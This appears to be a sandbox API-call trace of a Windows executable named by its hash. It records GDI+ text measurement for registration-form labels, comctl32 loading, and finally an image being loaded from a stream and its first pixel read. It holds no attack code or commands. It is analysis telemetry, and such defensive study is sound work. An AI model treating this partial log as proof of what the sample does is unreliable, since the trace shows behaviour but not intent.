[0128.033] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipMeasureString (graphics=0x657fb88, string="Department:-", length=12, font=0x657f598, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.033] GetLastError () returned 0x7f
[0128.033] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.033] GetLastError () returned 0x7f
[0128.033] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.034] GetLastError () returned 0x7f
[0128.034] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.034] GetLastError () returned 0x7f
[0128.034] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.034] GetLastError () returned 0x7f
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.034] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.034] GetSystemMetrics (nIndex=5) returned 1
[0128.034] GetSystemMetrics (nIndex=6) returned 1
[0128.035] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc08) returned 1
[0128.035] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19db08) returned 1
[0128.035] GetSystemMetrics (nIndex=5) returned 1
[0128.035] GetSystemMetrics (nIndex=6) returned 1
[0128.035] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.035] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.035] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279eb54) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipMeasureString (graphics=0x657fb88, string="Last Name", length=9, font=0x657f458, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.035] GetLastError () returned 0x7f
[0128.035] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.035] GetLastError () returned 0x7f
[0128.035] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.036] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.036] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279ebbc) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipMeasureString (graphics=0x657fb88, string="Middle Name", length=11, font=0x657f430, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.036] GetLastError () returned 0x7f
[0128.036] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.036] GetLastError () returned 0x7f
[0128.036] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.036] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.036] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279ec24) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipMeasureString (graphics=0x657fb88, string="First Name", length=10, font=0x657f408, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.037] GetLastError () returned 0x7f
[0128.037] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.037] GetLastError () returned 0x7f
[0128.037] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.037] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.037] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279ec8c) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipMeasureString (graphics=0x657fb88, string="Username:-", length=10, font=0x657f3e0, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.038] GetLastError () returned 0x7f
[0128.038] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.038] GetLastError () returned 0x7f
[0128.038] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.038] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.038] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279ecf4) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipMeasureString (graphics=0x657fb88, string="Mobile Number:-", length=15, font=0x657f3b8, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.039] GetLastError () returned 0x7f
[0128.039] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.039] AdjustWindowRectEx (in: lpRect=0x19dc08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dc08) returned 1
[0128.039] AdjustWindowRectEx (in: lpRect=0x19db08, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db08) returned 1
[0128.039] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da3c) returned 0x0
[0128.039] GetLastError () returned 0x7f
[0128.040] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279ed5c) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da20) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipMeasureString (graphics=0x657fb88, string="Name:-", length=6, font=0x546efc0, layoutRect=0x19da1c, stringFormat=0x657fe68, boundingBox=0x19da0c, codepointsFitted=0x19da08, linesFilled=0x19da04) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.040] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.040] GetLastError () returned 0x7f
[0128.040] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0128.040] GetLastError () returned 0x7f
[0128.120] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19db14) returned 0x0
[0128.120] GetLastError () returned 0x7f
[0128.135] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279f100) returned 0x0
[0128.135] GetLastError () returned 0x7f
[0128.135] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0128.135] GetLastError () returned 0x7f
[0128.135] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x1) returned 0x0
[0128.135] GetLastError () returned 0x7f
[0128.135] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0128.136] GetLastError () returned 0x7f
[0128.136] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da38) returned 0x0
[0128.136] GetLastError () returned 0x7f
[0128.136] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0128.136] GetLastError () returned 0x7f
[0128.136] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da60) returned 0x0
[0128.136] GetLastError () returned 0x7f
[0128.137] GdipGetStringFormatTrimming (format=0x657fe68, trimming=0x19da60) returned 0x0
[0128.137] GetLastError () returned 0x7f
[0128.138] GdipGetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=0x19da60) returned 0x0
[0128.138] GetLastError () returned 0x7f
[0128.139] GdipGetStringFormatAlign (format=0x657fe68, align=0x19da60) returned 0x0
[0128.139] GetLastError () returned 0x7f
[0128.140] GdipGetStringFormatLineAlign (format=0x657fe68, align=0x19da60) returned 0x0
[0128.140] GetLastError () returned 0x7f
[0128.140] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0128.140] GetLastError () returned 0x7f
[0128.140] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0128.140] GetLastError () returned 0x7f
[0128.180] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0129.489] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6a6a0000
[0129.540] GetLastError () returned 0x0
[0129.540] GetProcAddress (hModule=0x6a6a0000, lpProcName="ImageList_WriteEx") returned 0x0
[0129.547] FreeLibrary (hLibModule=0x6a6a0000) returned 1
[0129.552] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0129.582] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6a6a0000
[0129.591] GetLastError () returned 0x7e
[0129.591] GetProcAddress (hModule=0x6a6a0000, lpProcName="ImageList_WriteEx") returned 0x0
[0129.591] FreeLibrary (hLibModule=0x6a6a0000) returned 1
[0129.639] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da48) returned 0x0
[0129.639] GetLastError () returned 0x0
[0129.641] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279f1a8) returned 0x0
[0129.641] GetLastError () returned 0x0
[0129.641] GdipSetStringFormatFlags (format=0x65801b8, flags=2048) returned 0x0
[0129.641] GetLastError () returned 0x0
[0129.647] GdipSetStringFormatTrimming (format=0x65801b8, trimming=0x1) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipSetStringFormatHotkeyPrefix (format=0x65801b8, hotkeyPrefix=1) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipSetStringFormatAlign (format=0x65801b8, align=0x0) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipSetStringFormatLineAlign (format=0x65801b8, align=0x1) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipGetStringFormatFlags (format=0x65801b8, flags=0x19da44) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipSetStringFormatFlags (format=0x65801b8, flags=6144) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] GdipMeasureString (graphics=0x657fed8, string="Male", length=4, font=0x657f818, layoutRect=0x19da28, stringFormat=0x65801b8, boundingBox=0x19da18, codepointsFitted=0x19da14, linesFilled=0x19da10) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.647] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.647] GetLastError () returned 0x0
[0129.647] GdipDeleteStringFormat (format=0x65801b8) returned 0x0
[0129.647] GetLastError () returned 0x0
[0129.648] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.648] GetLastError () returned 0x0
[0129.648] GdipDeleteGraphics (graphics=0x657fed8) returned 0x0
[0129.648] GetLastError () returned 0x0
[0129.672] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.672] GetLastError () returned 0x0
[0129.672] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0129.672] GetLastError () returned 0x0
[0129.687] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19db14) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279f398) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipSetStringFormatAlign (format=0x657fe68, align=0x0) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipSetStringFormatLineAlign (format=0x657fe68, align=0x1) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipSetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=1) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da38) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipSetStringFormatFlags (format=0x657fe68, flags=2048) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatFlags (format=0x657fe68, flags=0x19da60) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatTrimming (format=0x657fe68, trimming=0x19da60) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatHotkeyPrefix (format=0x657fe68, hotkeyPrefix=0x19da60) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatAlign (format=0x657fe68, align=0x19da60) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] GdipGetStringFormatLineAlign (format=0x657fe68, align=0x19da60) returned 0x0
[0129.687] GetLastError () returned 0x0
[0129.687] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.687] GetLastError () returned 0x0
[0129.687] GdipDeleteStringFormat (format=0x657fe68) returned 0x0
[0129.688] GetLastError () returned 0x0
[0129.688] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0129.704] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6a6a0000
[0129.712] GetLastError () returned 0x7e
[0129.713] GetProcAddress (hModule=0x6a6a0000, lpProcName="ImageList_WriteEx") returned 0x0
[0129.713] FreeLibrary (hLibModule=0x6a6a0000) returned 1
[0129.715] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0129.719] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6a6a0000
[0129.730] GetLastError () returned 0x7e
[0129.731] GetProcAddress (hModule=0x6a6a0000, lpProcName="ImageList_WriteEx") returned 0x0
[0129.731] FreeLibrary (hLibModule=0x6a6a0000) returned 1
[0129.733] GdipCreateFromHDC (hdc=0x380106da, graphics=0x19da48) returned 0x0
[0129.733] GetLastError () returned 0x0
[0129.734] GdipCreateStringFormat (formatAttributes=0, language=0x0, format=0x279f3e0) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatFlags (format=0x65801b8, flags=2048) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatTrimming (format=0x65801b8, trimming=0x1) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatHotkeyPrefix (format=0x65801b8, hotkeyPrefix=1) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatAlign (format=0x65801b8, align=0x0) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatLineAlign (format=0x65801b8, align=0x1) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipGetStringFormatFlags (format=0x65801b8, flags=0x19da44) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipSetStringFormatFlags (format=0x65801b8, flags=6144) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] GdipMeasureString (graphics=0x657fed8, string="Female", length=6, font=0x657f5e8, layoutRect=0x19da28, stringFormat=0x65801b8, boundingBox=0x19da18, codepointsFitted=0x19da14, linesFilled=0x19da10) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.734] GetLastError () returned 0x0
[0129.734] GdipDeleteStringFormat (format=0x65801b8) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.734] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.734] GetLastError () returned 0x0
[0129.734] GdipDeleteGraphics (graphics=0x657fed8) returned 0x0
[0129.734] GetLastError () returned 0x0
[0129.735] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0129.735] GetLastError () returned 0x0
[0129.735] GdipDeleteGraphics (graphics=0x657fb88) returned 0x0
[0129.736] GetLastError () returned 0x0
[0129.782] AdjustWindowRectEx (in: lpRect=0x19db98, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db98) returned 1
[0129.782] AdjustWindowRectEx (in: lpRect=0x19db98, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19db98) returned 1
[0136.282] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6e9438 | out: hHeap=0x6c0000) returned 1
[0162.403] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19d31c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0162.404] GetLastError () returned 0x0
[0162.459] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19d970, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0162.459] GetLastError () returned 0x57
[0162.459] SetErrorMode (uMode=0x1) returned 0x0
[0162.461] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19de18 | out: lpFileInformation=0x19de18*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0162.462] GetLastError () returned 0x2
[0162.462] SetErrorMode (uMode=0x0) returned 0x1
[0163.029] IIDFromString (in: lpsz="{0000000C-0000-0000-C000-000000000046}", lpiid=0x23d1210 | out: lpiid=0x23d1210) returned 0x0
[0163.030] GdipLoadImageFromStream (stream=0x4e10030, image=0x19d85c) returned 0x0
[0163.971] GetLastError () returned 0x0
[0163.978] GdipImageForceValidation (image=0x657fb18) returned 0x0
[0164.010] GetLastError () returned 0x0
[0164.013] GdipGetImageType (image=0x657fb18, type=0x19d858) returned 0x0
[0164.013] GetLastError () returned 0x0
[0164.166] GdipGetImageRawFormat (image=0x657fb18, format=0x19d7c4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0
[0164.166] GetLastError () returned 0x0
[0164.260] GdipGetImageWidth (image=0x657fb18, width=0x19dec4) returned 0x0
[0164.260] GetLastError () returned 0x57
[0164.271] GdipGetImageHeight (image=0x657fb18, height=0x19dec4) returned 0x0
[0164.271] GetLastError () returned 0x57
[0164.289] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.289] GetLastError () returned 0x57
[0164.289] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.289] GetLastError () returned 0x57
[0164.294] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=0, color=0x19de90) returned 0x0
[0164.294] GetLastError () returned 0x57
